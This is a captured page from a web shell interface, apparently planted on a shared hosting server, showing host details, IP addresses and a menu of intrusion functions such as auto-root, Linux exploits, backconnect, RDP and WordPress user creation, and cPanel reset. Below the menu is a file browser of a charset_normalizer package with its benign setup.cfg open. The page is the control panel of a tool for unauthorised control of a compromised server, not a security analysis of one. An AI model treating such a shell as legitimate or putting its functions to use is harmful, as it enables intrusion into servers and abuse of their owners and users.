Linux id-dci-web1412.main-hosting.eu 5.14.0-611.20.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jan 14 06:35:04 EST 2026 x86_64
LiteSpeed
: 2a02:4780:6:1512:0:19fc:adf1:2 | : 216.73.216.85
Cant Read [ /etc/named.conf ]
8.1.34
u435990001
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
gsutil /
third_party /
charset_normalizer /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxr-xr-x
bin
[ DIR ]
drwxr-xr-x
charset_normalizer
[ DIR ]
drwxr-xr-x
data
[ DIR ]
drwxr-xr-x
docs
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
.codecov.yml
128
B
-rw-r--r--
.coveragerc
32
B
-rw-r--r--
.gitignore
1.69
KB
-rw-r--r--
.readthedocs.yaml
400
B
-rw-r--r--
CHANGELOG.md
18.08
KB
-rw-r--r--
CODE_OF_CONDUCT.md
3.28
KB
-rw-r--r--
CONTRIBUTING.md
3.64
KB
-rw-r--r--
LICENSE
1.04
KB
-rw-r--r--
MANIFEST.in
196
B
-rw-r--r--
README.md
12.7
KB
-rw-r--r--
SECURITY.md
201
B
-rw-r--r--
UPGRADE.md
768
B
-rw-r--r--
build-requirements.txt
449
B
-rw-r--r--
dev-requirements.txt
464
B
-rw-r--r--
setup.cfg
1.99
KB
-rw-r--r--
setup.py
808
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : setup.cfg
[metadata] name = charset-normalizer description = The Real First Universal Charset Detector. Open, modern and actively maintained alternative to Chardet. long_description = file: README.md, CHANGELOG.md, LICENSE long_description_content_type = text/markdown keywords = encoding, charset, charset-detector, detector, normalization, unicode, chardet, detect url = https://github.com/Ousret/charset_normalizer license = MIT author_email = tahri.ahmed@proton.me author = Ahmed TAHRI project_urls = Bug Reports = https://github.com/Ousret/charset_normalizer/issues Documentation = https://charset-normalizer.readthedocs.io/en/latest classifiers = Development Status :: 5 - Production/Stable License :: OSI Approved :: MIT License Intended Audience :: Developers Topic :: Software Development :: Libraries :: Python Modules Operating System :: OS Independent Programming Language :: Python Programming Language :: Python :: 3 Programming Language :: Python :: 3.7 Programming Language :: Python :: 3.8 Programming Language :: Python :: 3.9 Programming Language :: Python :: 3.10 Programming Language :: Python :: 3.11 Programming Language :: Python :: 3.12 Programming Language :: Python :: 3.13 Programming Language :: Python :: Implementation :: PyPy Topic :: Text Processing :: Linguistic Topic :: Utilities Typing :: Typed [options.packages.find] exclude = tests *.tests *.tests.* tests.* docs* data* [options.extras_require] unicode_backport = [options.entry_points] console_scripts = normalizer = charset_normalizer.cli:cli_detect [options] packages = find: include_package_data = True python_requires = >=3.7.0 [options.package_data] charset_normalizer = py.typed [tool:pytest] addopts = --cov=charset_normalizer --cov-report=term-missing -rxXs [flake8] ignore = W503, E203, B305 max-line-length = 120 [mypy] disallow_untyped_defs = True ignore_missing_imports = True [tool:isort] profile = black combine_as_imports = True
Close